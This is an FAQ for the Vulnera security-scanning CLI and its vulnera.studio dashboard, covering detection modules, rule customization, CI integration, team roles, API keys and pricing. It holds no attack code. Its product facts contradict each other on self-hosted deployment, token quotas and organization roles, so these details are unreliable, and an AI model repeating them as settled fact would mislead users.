Reference: SAST Analysis
ML vs. LLM
What’s the difference between ML models and LLM features?
| Aspect | ML Models (Detection) | LLM Features (Explanation) |
|---|---|---|
| Purpose | Find vulnerabilities | Explain & fix vulnerabilities |
| Technology | Pattern matching, AST parsing, entropy | Google Gemini |
| Speed | <1 second | 3-10 seconds |
| Offline | ✅ Yes | ❌ No |
| Cost | 3 tokens | 6 tokens |
| Deterministic | ✅ Same input = same output | ❌ May vary slightly |
Are ML models proprietary?
Detection models (SAST, Secrets, API) are rule-based and open-source:
- SAST: tree-sitter AST patterns (GitHub open-source)
- Secrets: Entropy + regex patterns (public ML fingerprints)
- API: OpenAPI schema validation (OWASP standards)
LLM explanations use Google Gemini.
Can I use Vulnera without LLM features?
Yes. All detection modules work offline:
vulnera analyze --source . --modules sast,secrets,api,dependencies
# No LLM explanations, but full analysis completed
LLM is optional for:
- Explanations (
vulnera explain-finding <id>) - Code fixes (
vulnera generate-fix <id>) - Natural language queries (
vulnera query "How do I...?")
Customization
Can I customize SAST rules?
Yes, three ways:
-
Update existing rules:
# .vulnera.toml [sast] rule_overrides = { "SQL_INJECTION" = { severity = "high", enabled = true } } -
Add custom rules:
# .vulnera/custom_rules.py @sast_rule("CUSTOM_XSS") def check_unescaped_output(node): """Check for unescaped user input in HTML templates""" # Custom pattern matching logic -
Disable noisy rules:
[sast.disabled_rules] "LOW_ENTROPY_STRING" = true "COMMENTED_SECRET" = true
Reference: SAST Analysis
Can I filter out certain secret types?
Yes:
# .vulnera.toml
[secrets]
ignored_patterns = [
"GITHUB_TOKEN_PLACEHOLDER", # Exact string match
"^test_.*", # Regex patterns
]
# Or ignore by file
ignored_files = [
"docs/examples.md",
"tests/fixtures/**"
]
Command line:
vulnera analyze . --secrets-ignore-patterns="test_,example_"
Integration
How do I integrate Vulnera into GitHub Actions?
name: Security Scan
on: [push, pull_request]
jobs:
vulnera:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: vulnera-dev/vulnera-action@v1
with:
api-key: ${{ secrets.VULNERA_API_KEY }}
analysis-depth: standard
fail-on-severity: high
Reference: DevSecOps Quick Start
Can I scan S3 buckets?
Yes:
vulnera analyze --source s3://my-bucket/project \
--aws-credentials-from-env
Requirements:
- AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY environment variables
- S3 bucket must have read access
Reference: Cloud Engineer Quick Start
Does Vulnera support enterprise deployments?
Yes, three options:
- SaaS (api.vulnera.studio) — Fully managed
- Self-hosted Docker — On your infrastructure
- Kubernetes helm chart — Enterprise clusters
Reference: Architecture - Deployment Models
Performance
How long does analysis take?
Typical times (standard depth):
| Source | Size | Time |
|---|---|---|
| Small repo (5K LOC) | <1 MB | 2-5 sec |
| Medium repo (50K LOC) | 5-10 MB | 10-30 sec |
| Large repo (800K LOC) | 50-100 MB | 1-5 min |
Optimization:
# Faster (minimal depth)
vulnera analyze . --analysis-depth=minimal # 2-3 sec
# Slower (full depth)
vulnera analyze . --analysis-depth=full # +2-3x time
Can I parallelize scanning?
Yes:
# Scan 10 repos in parallel
for repo in repo1 repo2 ... repo10; do
vulnera analyze $repo --source-type=git &
done
wait
Concurrency limits:
- CLI: Unlimited (your machine)
- API: 50 concurrent jobs per organization
- Jobs queued beyond limit; respects rate limit
Organization & Teams
How do I share results with my team?
-
Create organization:
vulnera org create "My Team" -
Invite members:
vulnera org members add teammate@company.com --role=analyst -
Run scan under organization:
vulnera analyze . --org-id=<org-id> # Results visible to all org members
Reference: DevSecOps Quick Start
What are organization roles?
| Role | Permissions |
|---|---|
| Owner | Create/delete org, manage all settings, view all results |
| Admin * | Invite members, configure scanning policies, view analytics |
| Analyst * | Run scans, view results, generate reports |
| Viewer | View results only, read-only access |
Troubleshooting
Vulnera says “API Key not found” but I set VULNERA_API_KEY
Check:
echo $VULNERA_API_KEY # Verify variable is set
vulnera auth status # Check authentication
Possible causes:
- API key is revoked
- API key doesn’t have required organization access
- Environment variable not exported (use
export VULNERA_API_KEY=...)
Analysis returns empty results but I expect findings
Check:
-
Verify modules are enabled:
vulnera analyze . --modules=all --verbose # Should list sast, secrets, api, dependencies -
Lower analysis depth:
vulnera analyze . --analysis-depth=full # More aggressive -
Check file filter:
vulnera analyze . --include-files="**/*.py,**/*.js"
LLM explanations are slow or timing out
Solutions:
- Increase timeout:
vulnera config set llm.timeout=60 - Use organization tier for higher concurrency
- Request explanations asynchronously:
vulnera explain --async
Dashboard & Web Platform
What is vulnera.studio?
Vulnera Studio (vulnera.studio) is the central web dashboard for managing vulnerability analysis, team collaboration, and security insights. It provides:
- Personal Dashboard — View your scans and findings
- Organization Management — Team collaboration with shared quotas
- API Key Management — Generate keys for CLI and API access
- Integrations — Connect GitHub, GitLab, Slack, webhooks
- Analytics & Reporting — Track team metrics and generate compliance reports
- Billing Management — Upgrade plans and manage subscriptions
Access: Visit https://vulnera.studio and sign in with your email.
Reference: Dashboard Guide
How do I create an organization?
Step-by-step:
- Log in to vulnera.studio
- Click + New Organization in sidebar
- Enter organization name, description, and logo (optional)
- Select plan tier (Free, Pro, Enterprise)
- Click Create — you’re now the owner
What you get:
- Shared quota pool (e.g., 48 tokens/month for Free, 1000 for Pro)
- Team member management (invite/remove members)
- Centralized reporting and analytics
- Organization API keys for CI/CD
Reference: Organization Management
How do I invite team members?
Invite members to your organization:
- Go to Settings → Members
- Click Invite Member
- Enter email address(es) and select role:
- Admin — Manage team, integrations, settings
- Member — Create scans, resolve findings
- Viewer — Read-only access (good for executives)
- Click Send Invitations
- Members receive email with join link
Roles & Permissions:
- Owner — Full access, billing, delete organization
- Admin — Members, settings, integrations (no billing)
- Member — Create/view scans, resolve findings
- Viewer — Read-only access to scans and reports
Reference: Team Collaboration
How do I generate an API key for the CLI?
Generate API key:
- Log in to vulnera.studio
- Go to Settings → API Keys
- Click Generate New Key
- Name the key (e.g., “GitHub Actions”, “Local Dev”)
- Set expiration (Never, 30 days, 90 days, 1 year)
- Click Create and copy immediately (not shown again)
- Store securely in your credential manager or CI/CD secrets
Use in CLI:
vulnera auth login --api-key YOUR_API_KEY
Use in GitHub Actions:
- name: Scan with Vulnera
env:
VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
run: vulnera analyze . --all-modules
Security: Rotate API keys every 90 days. Revoke unused keys immediately.
What’s the difference between personal and organization API keys?
| Aspect | Personal Key | Organization Key |
|---|---|---|
| Quota | 40 tokens/day (your own) | Shared org quota (48/day for Free, 1000 for Pro) |
| Access | Your scans only | All org members’ scans |
| Team | Individual | Shared across team |
| Use case | Local dev, personal projects | CI/CD, team automation |
| Generated in | Settings → API Keys | Organization → Settings → API Keys |
Best practice: Use organization keys for CI/CD pipelines; personal keys for local testing.
How do I upgrade my organization’s plan?
Upgrade plan:
- Go to vulnera.studio → Settings → Billing
- Current plan and quota displayed
- Click Change Plan or Upgrade
- Select new tier (Pro, Enterprise) or add custom tokens
- Update payment method if needed
- Click Confirm Upgrade
Plan options:
- Free — 48 tokens/month, 5 members, basic integrations
- Pro — 1000 tokens/month, unlimited members, advanced integrations
- Enterprise — Custom tokens, SSO/SAML, custom domains, priority support
Downgrade: Available mid-cycle; changes take effect at next billing date.
Reference: Quota & Pricing
How do I connect GitHub for automatic scanning?
GitHub Integration setup:
- Go to vulnera.studio → Settings → Integrations → GitHub
- Click Connect GitHub
- Authorize Vulnera GitHub App (select repos or all repos)
- Enable auto-scan triggers:
- On push to main/develop
- On all pull requests
- Scheduled daily scan
- Save — scans now run automatically
What happens:
- PRs show Vulnera status checks
- Comments added to PRs with findings
- Merge blocked if critical issues found (configurable)
- Results uploaded to GitHub code scanning
Reference: Dashboard Guide - GitHub Integration
How do I set up Slack notifications?
Enable Slack integration:
- Go to vulnera.studio → Settings → Integrations → Slack
- Click Connect Slack Workspace
- Authorize Vulnera app in Slack
- Select notification channel
- Configure notification types:
- Critical findings (immediate)
- Daily digest
- Weekly summary
- Quota alerts
- Save
Example Slack message:
🚨 Critical Vulnerability Found
Repo: acme/backend
Finding: SQL Injection in /api/users.py
CVSS: 9.2
→ View Details [Link]
Reference: Dashboard Guide - Slack Integration
How do I view team analytics and usage?
Organization Analytics:
- Go to vulnera.studio → Organization → Analytics
- View dashboard:
- Total quota used vs. remaining
- Per-member breakdown (token consumption)
- Module usage (pie chart: Dependencies, SAST, Secrets, API)
- 6-month usage trend
- Top analyzed projects
Export report:
- Click Export
- Choose format: CSV, JSON, or PDF
- Download for spreadsheets or stakeholder reporting
Reference: Dashboard Guide - Quota Management
Can I generate compliance reports from the dashboard?
Yes, multiple report types:
- Go to vulnera.studio → Reports → Compliance Reports
- Select framework:
- SOC2 Type II
- ISO 27001
- GDPR
- HIPAA (Enterprise)
- PCI DSS (Enterprise)
- Select date range
- Click Generate → PDF/HTML download
- Share with auditors or stakeholders
Report contents:
- Security metrics summary
- Audit log excerpts
- Member access records
- Vulnerability remediation status
- Data handling compliance statements
Reference: Dashboard Guide - Reporting & Export
How do I remove a team member?
Remove member from organization:
- Go to vulnera.studio → Settings → Members
- Find member in list
- Click Remove (⋯ menu)
- Confirm removal — member loses access immediately
What happens:
- Member can no longer see organization scans
- Their scans remain in history (for audit)
- Their API keys are revoked
- Activity logged in audit trail
Reinvite later: Can re-invite removed members anytime
Reference: Organization Management - Removing Members
Security & Privacy
Is my code scanned securely?
Data handling:
| Data | Storage | Retention |
|---|---|---|
| Code artifacts | Encrypted in transit, encrypted at rest | 30 days (deleted) |
| Findings | Database (encrypted) | Until you delete |
| API keys | Hashed in database | Until revoked |
| User data | GDPR compliant | Until account deletion |
Reference: Architecture - Security Model
Can I see Vulnera’s source code?
Partial:
- Open-source: SAST rules, Secrets patterns, CLI utilities
- Proprietary: LLM integration, API backend, rate limiting logic
- Reference: GitHub open-source modules
Is on-premise deployment available?
NO. Vulnera doesn’t supports self-hosted deployment with plan to support in future.
Contact Vulnera for enterprise licenses.
Cost & Licensing
Is there a free tier?
Yes:
| Tier | Features | Cost |
|---|---|---|
| Community | SAST, Secrets, API (offline) | Free |
| Developer | +Dependency scanning, LLM (limited 40 tokens/day) | Free/API key |
| Organization | Team collaboration, 100 tokens/day, analytics | $99/month |
| Enterprise | Unlimited, SLA | Custom |
Reference: Quota & Pricing
What if I exceed my quota?
Billing options:
- Auto-upgrade — Automatically upgrade org to higher tier at month-end
- Per-use billing — Pay $0.10/token over quota (prepay)
- Reserved quota — Pre-purchase token packages at 20% discount
Set preferences in organization settings > Billing.
Getting Help
Resources:
- Documentation: Full guide
- Community: GitHub Discussions
- Web: vulnera.studio
- Enterprise SLA: Contact vulnera sales for support plans.
For bugs: GitHub Issues